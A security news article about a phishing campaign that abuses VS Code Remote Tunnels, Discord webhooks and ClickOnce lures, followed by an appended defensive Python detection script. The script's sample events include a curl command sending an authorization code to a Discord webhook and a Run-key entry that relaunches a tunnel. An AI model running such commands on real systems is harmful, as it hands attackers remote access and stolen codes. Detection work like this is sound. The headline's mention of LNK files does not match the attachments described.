GBHackers

Operation Dragon Whistle Targets Changzhou University with Malicious LNK Files


A recent phishing campaign dubbed “Operation Dragon Whistle” highlights an evolving trend in cyberattacks: threat actors abusing legitimate developer tools and cloud services to maintain stealth and persistence.

Although initially linked to targeting academic environments such as Changzhou University, new analysis reveals overlapping tactics used in a broader campaign aimed at government-linked organizations, including Pakistan’s Punjab Safe Cities Authority (PSCA) and PPIC3.

The email references ongoing projects such as the Safe Jail initiative and includes technical terms like CAD designs and Automatic Number Plate Recognition systems. This level of detail suggests prior reconnaissance and increases the likelihood of user interaction.

The email contains two attachments designed to initiate separate infection chains while relying on the same attacker-controlled infrastructure hosted on a BunnyCDN domain.

The first attachment, a malicious Word document titled “CAD Reprot.doc,” contains embedded VBA macros. Once opened, the macro automatically executes and downloads an executable named code.exe into the system’s temporary directory.

Instead of deploying traditional malware, the attackers leverage Visual Studio Code’s command-line interface. The macro executes a command that initiates a Microsoft device authentication flow through VS Code Remote Tunnels.

Overview of the kill chain (Source: Joe Security).

This generates a device authorization code, which is typically used for secure login. However, in this campaign, the code is captured from the system output and exfiltrated to a Discord webhook controlled by the attacker.

According to Joe Security, the attack begins with a carefully crafted spear-phishing email impersonating an internal consultant. Unlike typical phishing attempts that rely on urgency or fear, this message mimics routine internal communication.

This technique represents a shift from credential phishing to device enrollment. Rather than stealing usernames and passwords, the attacker uses the captured authorization code to authenticate their own Microsoft account on the victim’s machine.

This effectively links the compromised system to the attacker’s VS Code environment, allowing remote access through a legitimate Microsoft service.

Operation Dragon Whistle

Further analysis shows that persistence is achieved through a registry modification rather than a traditional Windows service.

The VS Code CLI generated a Microsoft device authorization code and prompted the user to visit the Microsoft device-login page.

Microsoft device-login page (Source: Joe Security).

A registry entry is added under the current user’s Run key, so the VS Code tunnel is launched each time the user logs in. Once active, the tunnel enables full remote interaction, including terminal access and file operations, all within an encrypted and trusted communication channel.

The second attachment, “ANPR Reprot.pdf,” follows a different approach. It displays a fake Adobe Reader update prompt and redirects users to download a ClickOnce deployment file.

This file, disguised with Adobe branding, is designed to install a .NET-based payload. Although the final payload could not be recovered due to the server being blocked, analysis suggests it was intended to execute additional malicious components.

The use of ClickOnce is particularly notable because it exploits legacy enterprise environments where Internet Explorer or Edge compatibility modes are still in use.

The VS Code client and the “Remote – Tunnels” extension. After signing in with the test Microsoft account, we granted the extension permission to sign in using Microsoft.

Remote – Tunnels extension (Source: Joe Security).

These environments may automatically process such deployment manifests, increasing the likelihood of successful execution.

What makes this campaign significant is its reliance on legitimate tools such as Visual Studio Code and Discord rather than custom malware. By blending malicious activity with trusted services, attackers reduce the chance of detection and bypass many traditional security controls.

The campaign also demonstrates a clear shift toward living-off-the-land techniques, where built-in or widely trusted applications are weaponized.

This operation underscores the need for organizations to monitor not just suspicious files, but also unusual usage of legitimate tools.

Security teams should pay close attention to abnormal VS Code activity, unexpected device authentication flows, and outbound connections to platforms like Discord, as these may indicate compromise even in the absence of conventional malware.
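As an added illustration of that recommendation (this is not code from the GBHackers article or from the Joe Security report), the Python script below applies three detections to constructed, Sysmon-style process-creation and registry events: a VS Code CLI `tunnel` launch weighted by its parent process and file location, a Discord webhook URL appearing on a command line, and a Run-key value that re-launches the tunnel. The event field names, file paths, SID and webhook id are assumptions and placeholders, not values from the campaign.

```python
import re

# Constructed sample telemetry in a Sysmon-like shape (id 1 = process create,
# id 13 = registry value set). Paths, the SID and the webhook id are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Users\u\AppData\Local\Temp\code.exe",
     "cmdline": r"C:\Users\u\AppData\Local\Temp\code.exe tunnel"},
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl -X POST https://discord.com/api/webhooks/1234567890/PLACEHOLDER_TOKEN -d code=ABCD-EFGH"},
    {"id": 13, "image": r"C:\Users\u\AppData\Local\Temp\code.exe",
     "target": r"HKU\S-1-5-21-EXAMPLE\Software\Microsoft\Windows\CurrentVersion\Run\VSCodeTunnel",
     "details": r"C:\Users\u\AppData\Local\Temp\code.exe tunnel"},
    # Benign: a developer opening a project from Explorer, no tunnel involved.
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "cmdline": r'"C:\Program Files\Microsoft VS Code\Code.exe" C:\src\project'},
]

# "code tunnel" is the VS Code CLI subcommand that opens a Remote Tunnel.
TUNNEL_RE = re.compile(r"(?i)\bcode(?:\.exe)?\b[^\n]*\btunnel\b")
# Discord webhook URLs have the shape https://discord.com/api/webhooks/<id>/<token>
WEBHOOK_RE = re.compile(r"(?i)https://discord(?:app)?\.com/api/webhooks/\d+/[\w-]+")
OFFICE_RE = re.compile(r"(?i)\\(?:WINWORD|EXCEL|POWERPNT|OUTLOOK)\.EXE$")
RUNKEY_RE = re.compile(r"(?i)\\CurrentVersion\\Run(?:Once)?\\")


def analyze(events):
    """Return one finding per event that matches a campaign-style behaviour."""
    findings = []
    for ev in events:
        cmd = ev.get("cmdline", "")
        if ev["id"] == 1 and TUNNEL_RE.search(cmd):
            # A tunnel spawned by an Office process, or a CLI living in %TEMP%,
            # is far more suspicious than a developer starting one from a shell.
            odd_context = bool(OFFICE_RE.search(ev.get("parent", ""))) or "\\Temp\\" in ev["image"]
            findings.append({"rule": "vscode_tunnel_launch", "image": ev["image"],
                             "severity": "high" if odd_context else "medium"})
        if ev["id"] == 1 and WEBHOOK_RE.search(cmd):
            findings.append({"rule": "discord_webhook_in_cmdline", "image": ev["image"], "severity": "high"})
        if ev["id"] == 13 and RUNKEY_RE.search(ev.get("target", "")) and TUNNEL_RE.search(ev.get("details", "")):
            findings.append({"rule": "vscode_tunnel_runkey_persistence", "image": ev["image"],
                             "target": ev["target"], "severity": "high"})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

The severity split matters in practice: developers do legitimately run `code tunnel`, so the rule only escalates when the launch context (Office parent, executable in a temp directory) or a Run-key re-launch matches the behaviour described above.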
